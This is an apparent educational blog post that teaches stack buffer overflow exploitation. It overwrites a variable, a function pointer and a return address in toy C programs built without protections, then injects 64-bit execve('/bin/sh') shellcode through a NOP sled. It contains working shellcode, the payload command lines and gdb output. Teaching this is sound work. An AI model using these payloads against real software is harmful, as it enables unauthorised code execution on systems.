A buffer overflow is a type of security vulnerability that could be used to execute malicious code. Learn how it works in this blog post.
Variable overwriting
In its simplest form, a buffer overflow implementation overwrites parts of memory that, from a security and safety perspective, it should not have access to. Consider for example this small C program, which has an unused integer a
, and copies the first command line argument to the buf
array:
#include <stdio.h> // printf #include <string.h> // strcpy int main(int argc, char *argv[]) { int a=0; char buf[5]; strcpy(buf, argv[1]); printf (a!=0?"overwritten\n":"unchanged\n"); }
The integer a
is initialized on the stack with value 0, after which a char array of size 5 is allocated on the stack. Because the function strcpy
is used irresponsibly here, we can input more than 5 characters to overwrite the integer value on the stack. The printf
function will show you if it was successful.
Compiling this with gcc -o buf buf.c
and trying to overwrite the buffer with input “AAAAAA
“, the program crashes with an error message:
$ ./buf AAAAA unchanged $ ./buf AAAAAA unchanged *** stack smashing detected ***: terminated Aborted (core dumped)
The program was compiled by gcc
to detect buffer overflows like this. It does so by putting “canaries” (named after the coal mine poison-detection mechanism), i.e., random values put between the program values and arrays on the stack, and having the binary check if they remain unchanged. Although this is a brilliant security measure, for educational purposes, we want to turn this compiler feature off by invoking gcc
with the flag -fno-stack-protector
.
$ gcc -o buf var.c -fno-stack-protector $ ./buf AAAAA unchanged $ ./buf AAAAAA overwritten
Pointer overwriting
As an attacker, it is more interesting to be able to execute code than to just overwrite some value. For now, let’s use a function that we define and compile ourselves:
#include<stdio.h> //printf #include<string.h> //strcpy void malicious() { printf("malicious procedure\n"); } void normal() { printf("normal procedure\n"); } int main(int argc, char *argv[]) { void (*fun) () = normal; char buf[5]; strcpy(buf,argv[1]); fun(); }
In the main function, the pointer fun
points to the function normal
and is executed at the end. The pointer is pushed to the stack before the char array buf
. This allows us to overwrite the function pointer with the address of our malicious code. To find this address, we will use gdb
:
$ gcc -o fun fun.c -fno-stackprotector $ gdb fun ... (gdb) run AAAA normal procedure [Inferior 1 (process 561710) exited normally] (gdb) info function malicious Non-debugging symbols: 0x0000555555555149 malicious
This address 0x0000555555555149
, obtained by querying gdb
with info function malicious
, is the entry point of our malicious function. The leading 0x indicates a hexadecimal value. Every pair of hexadecimal digits represents one byte. We can convert this address into ASCII characters that we can input to overflow the buf
array and overwrite the function pointer with the address we want:
echo 0000555555555159 -n | xxd -r -p | od -c
Or use an online tool such as this one. The resulting ASCII string is ^@^@UUUUQI, where ^@ denotes the NUL character. Copy or type in the obtained ASCII string and input it in your program. The NUL character can be obtained by drawing two NUL bytes from /dev/zero using head
or dd
:
(gdb) run $(echo "AAAAA$(head -c 2 /dev/zero)UUUUQY") malicious procedure (gdb) run $(echo "AAAAA$(dd if=/dev/zero bs=1 count=2)UUUUQY") malicious procedure
If you get a segmentation fault and you don’t see the message “malicious procedure”, then you are probably working on a little-endian machine, and you should input the string of bytes in reverse:
(gdb) run $(echo "AAAAAYQUUUU$(head -c 2 /dev/zero)") malicious procedure (gdb) run $(echo "AAAAAYQUUUU$(dd if=/dev/zero bs=1 count=2)") malicious procedure
Congrats! You have successfully executed “malicious code” by use of an overflow.
Overwriting Return Addresses
The function pointer fun
that pointed to the normal procedure was pushed to the stack of the main function because we declared it ourselves. But we do not have to create a function pointer ourselves to execute our malicious function. When a function is called, a stack frame is created. Before the function is executed, a return address is pushed to the stack. This return address is a way for the processing unit to remember where to continue execution of the program after the function is finished.
Consider the following program:
#include<stdio.h> // printf #include<stdlib.h> // exit #include<string.h> // strcpy void malicious() { printf("malicious procedure\n"); exit(0); } void normal() { printf("normal procedure\n"); } void foo(char *src) { char buf[100]; strcpy(buf,src); printf("%s\n",buf); } int main(int argc, char *argv[]) { foo(argv[1]); normal(); }
First, foo
is executed. If buf
is not overflowed then after foo
is finished the processor will continue execution where it left off in the main function, and proceed to execute the function normal
. However, we can overflow buf
to overwrite the return address in the stack frame of foo
to continue execution at the address we choose. For this, we just try a couple of lengths for our input strings of repeating A
‘s, starting from 100. The number of A
’s needed to overwrite the return address may differ per machine or compiler; in my case, I found the A
’s started appearing in the return address after length 120 (the hexadecimal value of the character ‘A’ is 41):
$ gcc -o ret ret.c -fno-stack-protector $ gdb ret (gdb) run $(head -c 120 /dev/zero | tr '\0' 'A') AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x00007fffffffe538 in ?? () (gdb) run $(head -c 123 /dev/zero | tr '\0' 'A') AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x0000555500414141 in ?? ()
So our attack plan is to put 120 A’s into the buffer, followed by the address of the function malicious
:
(gdb) info function malicious All functions matching regular expression "malicious": Non-debugging symbols: 0x0000555555555159 malicious (gdb) run $(echo "$(head -c 120 /dev/zero | tr '\0' 'A')$(echo 0000555555555159 -n | xxd -r -p)") /bin/bash: line 1: warning: command substitution: ignored null byte in input AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYQUUUU malicious procedure [Inferior 1 (process 666246) exited normally]
Remember that the address needs to be reverted on Little-Endian machines:
(gdb) run $(echo "$(head -c 120 /dev/zero | tr '\0' 'A')$(echo 0000555555555159 -n | xxd -r -p | rev)")
It’s funny how gdb
reports successful termination. This is because we deceitfully ended our malicious function with exit(0)
.
Opening a Linux 64-bit Shell
Instead of having to compile a malicious function, we could fill the buffer with binary code that performs the same function. For example, we could fill the buffer with code that opens a shell for us. From this cool blog post, binary/assembly code that opens a shell on a Linux 64-bit machine is given by this hexadecimal string:
6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05
This peace of assembly makes a system call to execve
with the string /bin/sh
, which should open a shell for us. So how do we execute this with a buffer overflow? Consider the following program, which, like before, simply echos back the first command line argument, without properly checking its length:
#include <stdio.h> #include <string.h> void foo(char *src) { char buf[100]; strcpy(buf,src); printf ("%s\n",buf); } int main(int argc, char *argv[]) { foo(argv[1]); }
Like before, we have to find the return address in the stack frame of the function foo
. This time, however, we don’t point to some other function, but we point inside the buffer, where we also put our assemble code that opens a shell. Using gdb
, I find again that the return address is overwritten once we get past a string of A
s of length 120.
Our buffer overflow string will thus be of length 128 and look as follows:
- 60 bytes containing the hex value 90;
- 40 bytes containing the assembly for opening a shell;
- 20 bytes of random data; and
- 8 bytes with the address at which we wish to continue execution.
The first 60 bytes could be random too, but there is a good reason for picking hex value 90. If it is random data, we have to provide the 8 byte address pointing exactly to where our assembly code starts. But now we can point anywhere within the range of the 60 bytes of 0x90, because 0x90 is the NOP code (no operation), telling the processing unit to just skip to the next instruction. This initial range of NOP instructions is called the NOP sled.
First, we compile the program with gcc
with flag -zexecstack
, allowing the program to execute code on the stack.
$ gcc -o asm asm.c -fno-stack-protector -zexecstack
Next, we find that the return address (in my case, starting from 60+40+20=120):
$ gdb asm ... (gdb) run $(printf "\x90%.0s" {1..60})$(echo 6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05 -n | xxd -r -p)$(printf "A%.0s" {1..23}) j;XH1�//bin/shI�APH�WH�j<XH1AAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x0000555500414141 in ?? ()
Here, I use printf "\x90%.0s" {1..60}
to generate 60 NOP bytes. This is followed by the 40 bytes of code opening a shell, and finally, 23 A
s. We can see that 3 A
s appear in the return address. To figure out what address we use to overwrite the return address, we use the x
command in gdb
to find the NOP sled. We look at 100 four-byte words (x/100x
), starting from 200 words before the stack pointer $rsp
:
(gdb) x/100x $rsp-200 0x7fffffffe2a8: 0xffffe4a8 0x00007fff 0x00000002 0x00000000 0x7fffffffe2b8: 0x00000000 0x00000000 0xf7ffd000 0x00007fff 0x7fffffffe2c8: 0x55557dd8 0x00005555 0xffffe360 0x00007fff 0x7fffffffe2d8: 0x55555174 0x00005555 0x004a0000 0x00000000 0x7fffffffe2e8: 0xffffe7f5 0x00007fff 0x90909090 0x90909090 0x7fffffffe2f8: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe308: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe318: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe328: 0x90909090 0x48583b6a 0xb849d231 0x69622f2f 0x7fffffffe338: 0x68732f6e 0x08e8c149 0x89485041 0x485752e7 0x7fffffffe348: 0x050fe689 0x48583c6a 0x050fff31 0x41414141 0x7fffffffe358: 0x41414141 0x41414141 0x41414141 0x41414141 0x7fffffffe368: 0x00414141 0x00005555 0xffffe4a8 0x00007fff 0x7fffffffe378: 0xffffe4a8 0x00000002 0xffffe420 0x00007fff 0x7fffffffe388: 0xf7dae488 0x00007fff 0xffffe3d0 0x00007fff 0x7fffffffe398: 0xffffe4a8 0x00007fff 0x55554040 0x00000002 0x7fffffffe3a8: 0x55555177 0x00005555 0xffffe4a8 0x00007fff 0x7fffffffe3b8: 0xafc58c2c 0xf6337170 0x00000002 0x00000000 0x7fffffffe3c8: 0x00000000 0x00000000 0xf7ffd000 0x00007fff 0x7fffffffe3d8: 0x55557dd8 0x00005555 0xa0a58c2c 0xf6337170 0x7fffffffe3e8: 0xaffb8c2c 0xf633613a 0x00000000 0x00007fff 0x7fffffffe3f8: 0x00000000 0x00000000 0x00000000 0x00000000 0x7fffffffe408: 0x00000002 0x00000000 0xffffe4a0 0x00007fff 0x7fffffffe418: 0xa74d6e00 0xa0240718 0xffffe480 0x00007fff 0x7fffffffe428: 0xf7dae54c 0x00007fff 0xffffe4c0 0x00007fff
The NOP sled starts somewhere in the range of hex addresses ending in e2e8 and e328. Let’s pick 0x7fffffffe318 to start out shell-opening code (I’m on a Little-Endian machine, so I use the reversed byte order).
(gdb) run $(printf "\x90%.0s" {1..60})$(echo 6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05 -n | xxd -r -p)$(printf "A%.0s" {1..20})$(echo 18e3ffffff7f -n | xxd -r -p) j;XH1�//bin/shI�APH�WH�j<XH1AAAAAAAAAAAAAAAAAAAA� sh-5.2$
That’s it! A shell opened! Notice again that if we exit the shell, gdb
reports a normal exit. Again, this is because the 40-byte assembly code ends with an exit(0)
system call.
Leave a reply!